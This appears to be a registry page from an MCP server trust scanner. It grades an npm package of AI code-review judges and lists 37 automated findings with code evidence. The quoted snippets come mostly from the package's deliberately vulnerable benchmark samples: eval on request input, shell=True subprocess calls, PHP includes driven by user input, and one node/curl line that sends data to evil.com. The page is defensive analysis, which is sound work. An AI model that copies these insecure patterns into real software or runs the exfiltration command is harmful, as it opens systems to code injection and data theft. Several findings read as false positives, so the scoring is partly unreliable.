Judges MCP Server

@kevinrabun/judges npm v3.129.9 Source verified

Published by kevinrabun — publish provenance cryptographically ties this package to that repository. That is proof of origin, not an official vendor package.

45 specialized judges that evaluate AI-generated code for security, cost, and quality.

Trust grade
B
85/100
Last scanned get badge →
Trust
B · 85/100
Adoption risk for you: the threat score, then adjusted down for blast radius, publisher verification and how much the scan could see. Deterministic; every point is auditable.
Capability
High
Blast radius if it went rogue — what the server’s tools could reach. Independent of trust.
Coverage
Source
How much the scan could actually inspect. Shallow coverage is stated, never hidden.
Share this Trust Score
𝕏 Share LinkedIn Reddit
B Why this grade threat 91 − adoption risk = 85/100

The grade answers one question — how safe is this server for you to adopt — so it is computed in two auditable stages. Nothing below is an opinion or an LLM's guess; every line is a real term the deterministic engine applied, and the same input always yields the same number.

1. Threat score — 100 − 9.5 = 91. What the published surface and source actually contain:

PointsWhat was foundCategory
−9.5 Untrusted input concatenated into a command sink ×2 MTC-SRC-009 injection

2. Client adoption risk — 91 − 6 = 85. Three small, subtract-only factors that reflect your risk in adopting it — a clean scan proves less on a powerful, unverified or barely-inspectable package, so the grade says so plainly:

PointsAdoption-risk factor
−6 capability blast radius (high) — client exposure if the model is manipulated

Capability observations and info notes are shown under Findings but never scored. Open any row's finding below for the file, line and evidence behind a deduction.

Findings 37

high Reads a sensitive credential path or dumps the environment (dist/evaluators/hallucination-detection.js)MTC-SRC-006

In the server's implementation (`dist/evaluators/hallucination-detection.js:1155`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: "and configure your .npmrc to route scoped packages to your private registry.", reference: "Dep

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/evaluators/hallucination-detection.js

high Dynamic code execution in server code (dist/commands/benchmark-advanced.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-advanced.js:1096`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: o-eval const result = eval(req.body.expression); // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-advanced.js

high Dynamic code execution in server code (dist/commands/benchmark-ai-agents.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-ai-agents.js:714`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: "convenience" return eval(expression); } // AI-generated template renderer export function renderTemplate(template:

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-ai-agents.js

high Dynamic code execution in server code (dist/commands/benchmark-expanded-2.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-expanded-2.js:2592`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: T['formula']; $result = eval("return " . $formula . ";"); echo "Result: $result"; // Insecure file upload - no validati

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded-2.js

high Dynamic code execution in server code (dist/commands/benchmark-expanded.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-expanded.js:275`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: T['formula']; $result = eval("return " . $formula . ";"); echo "Result: $result"; ?>`, expectedRuleIds: ["CYBER-

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded.js

high Dynamic code execution in server code (dist/commands/benchmark-languages.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-languages.js:455`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: arams[:expr] result = eval(expression) { result: result }.to_json end post '/transform' do code = JSON.parse(requ

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-languages.js

high Dynamic code execution in server code (dist/commands/benchmark-quality-ops.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-quality-ops.js:1266`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: o-eval const result = eval(req.body.expression); // eslint-disable-next-line @typescript-eslint/no-unsafe-assignment

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-quality-ops.js

high Dynamic code execution in server code (dist/commands/benchmark-security-deep.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark-security-deep.js:1468`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ry { const result = eval(expression); res.json({ result }); } catch (e) { res.status(400).json({ error: "I

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-security-deep.js

high Dynamic code execution in server code (dist/commands/benchmark.js)MTC-SRC-001

In the server's implementation (`dist/commands/benchmark.js:160`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ) => { const result = eval(req.body.expression); res.json({ result }); });`, expectedRuleIds: ["CYBER-001",

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark.js

high Dynamic code execution in server code (dist/commands/coach-mode.js)MTC-SRC-001

In the server's implementation (`dist/commands/coach-mode.js:33`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: xplanation: "eval() and new Function() execute arbitrary code strings, enabling code injection attacks where attacker-co

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/coach-mode.js

high Dynamic code execution in server code (dist/commands/deprecated.js)MTC-SRC-001

In the server's implementation (`dist/commands/deprecated.js:21`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: 01. The new rule covers eval(), Function(), and other injection vectors.", }, { ruleId: "PERF-LOOP-001",

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/deprecated.js

high Shell/command execution in server code (dist/commands/auto-fix.js)MTC-SRC-002

In the server's implementation (`dist/commands/auto-fix.js:31`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ents", before: 'exec("git " + command)', after: 'execFile("git", [command])', language: "typescr

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/auto-fix.js

high Shell/command execution in server code (dist/commands/batch-review.js)MTC-SRC-002

In the server's implementation (`dist/commands/batch-review.js:16`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ty: "critical", regex: /exec(?:Sync)?\s*\(\s*`[^`]*\$\{/ }, { name: "empty-catch", severity: "medium", regex: /catch

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/batch-review.js

high Shell/command execution in server code (dist/commands/benchmark-advanced.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-advanced.js:1432`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: irectory): result = subprocess.run(["dir", "/B", directory], capture_output=True, text=True, shell=True) return

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-advanced.js

high Shell/command execution in server code (dist/commands/benchmark-ai-agents.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-ai-agents.js:477`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ring) => { return execSync(command).toString(); }, }, { name: "read_file", description: "Read any

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-ai-agents.js

high Shell/command execution in server code (dist/commands/benchmark-compliance-ethics.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-compliance-ethics.js:1838`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: port { execSync } from "child_process"; import fs from "fs"; export function getSystemInfo() { // Linux-specific /pro

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-compliance-ethics.js

high Shell/command execution in server code (dist/commands/benchmark-coverage-gaps.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-coverage-gaps.js:807`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ": "node -e \\"require('child_process').exec('curl https://evil.com/collect?data='+encodeURIComponent(JSON.stringify({cw

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-coverage-gaps.js

high Shell/command execution in server code (dist/commands/benchmark-expanded-2.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-expanded-2.js:3914`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: xec with user input exec(f"output = f'{greeting}, {name}!'") return locals().get("output", "") `, expect

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded-2.js

high Shell/command execution in server code (dist/commands/benchmark-expanded.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-expanded.js:1754`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: tion deploy() { await exec(\`aws configure set aws_access_key_id \${DEPLOY_CONFIG.awsAccessKeyId}\`); await exec(\`d

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded.js

high Shell/command execution in server code (dist/commands/benchmark-languages.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-languages.js:379`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: id; $this->pdo->exec($sql); } public function deleteByName(string $name): int { $sql = "DELETE

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-languages.js

high Shell/command execution in server code (dist/commands/benchmark-security-deep.js)MTC-SRC-002

In the server's implementation (`dist/commands/benchmark-security-deep.js:934`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: Python subprocess with shell=True", language: "python", code: `import subprocess from flask import Flas

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-security-deep.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-advanced.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-advanced.js:366`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: tVisitedPages(), }; fetch("https://analytics.third-party.com/collect", { method: "POST", body: JSON.stringif

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-advanced.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-ai-agents.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-ai-agents.js:1121`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: it Promise.timeout( fetch("https://api.example.com/data"), 5000 ); // Promise.retry doesn't exist const r

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-ai-agents.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-compliance-ethics.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-compliance-ethics.js:1056`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: get_data(): resp = requests.get("https://api.example.com/data") return resp.json()`, expectedRuleIds: [

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-compliance-ethics.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-coverage-gaps.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-coverage-gaps.js:310`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const tokenRes = await fetch("https://provider.com/oauth/token", { method: "POST", body: JSON.stringify({ code,

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-coverage-gaps.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-expanded-2.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-expanded-2.js:4827`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const price = await fetch('https://api.pricing.com/widget').then(r => r.json()); assert(price.amount > 0); });

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded-2.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-expanded.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-expanded.js:1591`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: based analytics await fetch("https://analytics.us-east-1.amazonaws.com/ingest", { method: "POST", body: JSON.s

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-expanded.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-infrastructure.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-infrastructure.js:537`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const response = await fetch("https://payment-api.example.com/charge", { method: "POST", headers: { "Content-Ty

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-infrastructure.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-quality-ops.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-quality-ops.js:1887`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: tion syncExternal() { fetch("https://partner-api.com/sync").catch(() => {}); }`, expectedRuleIds: ["REL-001",

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-quality-ops.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark-security-deep.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark-security-deep.js:1185`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const response = await fetch("http://api.production.com/auth/login", { method: "POST", headers: { "Content-Type

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-security-deep.js

medium Hardcoded egress to an external endpoint (dist/commands/benchmark.js)MTC-SRC-003

In the server's implementation (`dist/commands/benchmark.js:97`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: r_secret_password_123"; fetch("https://api.example.com", { headers: { Authorization: "Bearer " + API_KEY } });`,

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark.js

medium Untrusted input concatenated into a command sink (dist/commands/commit-hygiene.js)MTC-SRC-009

In the server's implementation (`dist/commands/commit-hygiene.js:22`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: y { const log = execSync(`git log --oneline -${count} --format="%H|%s"`, { encoding: "utf-8", timeout: 10000 });

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/commit-hygiene.js

medium Untrusted input concatenated into a command sink (dist/commands/finding-trace.js)MTC-SRC-009

In the server's implementation (`dist/commands/finding-trace.js:56`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: blameLines = execSync(`git blame --porcelain "${sourcePath}"`, { encoding: "utf-8" }).split("\n"); }

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/finding-trace.js

medium Dynamic module load from a non-literal (dist/cli.js)MTC-SRC-005

In the server's implementation (`dist/cli.js:701`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const mod = await import(modulePath); await mod[fnName](argv); return; } // ─── List Comma

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/cli.js

medium Dynamic module load from a non-literal (dist/commands/benchmark-security-deep.js)MTC-SRC-005

In the server's implementation (`dist/commands/benchmark-security-deep.js:1355`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: dule = $_GET['module']; require($module); ?>`, expectedRuleIds: ["CYBER-001"], category: "injection",

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/benchmark-security-deep.js

medium Dynamic module load from a non-literal (dist/commands/design-audit.js)MTC-SRC-005

In the server's implementation (`dist/commands/design-audit.js:77`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: : `${unusedImportCount} import(s) may be unused — common AI-generation artifact`, }); } // 4. Pattern co

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/commands/design-audit.js

medium Dynamic module load from a non-literal (dist/config.js)MTC-SRC-005

In the server's implementation (`dist/config.js:574`): Loading a module chosen at runtime (from a variable) can pull in and run attacker-influenced code paths. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const mod = (await import(resolvedSpec)); // Strategy 1: Full JudgesPlugin export (best — gets hooks, r

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/config.js

What this scan could not see

Versions 1

Scan history per published version. The engine is deterministic — the same version always yields the same score, so a changed score means the package itself changed.

VersionScoreFindingsEngineScanned
v3.129.9 latest B 85/100 37 1.13.0 2026-09-07

Embed this score

Show this server's live Trust Score in your README, docs or website. The badge is served straight from the registry and updates automatically after every rescan — no API key needed. It links back to this page, so anyone who sees the grade can also read the findings behind it instead of taking a number on faith.

MCP Trust Score: B · 85/100
Markdown (GitHub README)
[![MCP Trust Score](https://mcptrustchecker.com/registry/kevinrabun-judges/badge.svg)](https://mcptrustchecker.com/registry/kevinrabun-judges)
HTML
<a href="https://mcptrustchecker.com/registry/kevinrabun-judges"><img src="https://mcptrustchecker.com/registry/kevinrabun-judges/badge.svg" alt="MCP Trust Score" height="20"></a>
Prefer shields.io styling? Point it at https://mcptrustchecker.com/registry/kevinrabun-judges/badge.json via https://img.shields.io/endpoint?url=…

Verify this score yourself

The score above is reproducible: the same package version always yields the same result. Run it locally or over the free API — no account, no LLM, fully deterministic.

npx mcptrustchecker scan @kevinrabun/judges --online

Use the free API → How scoring works

More in Developer Tools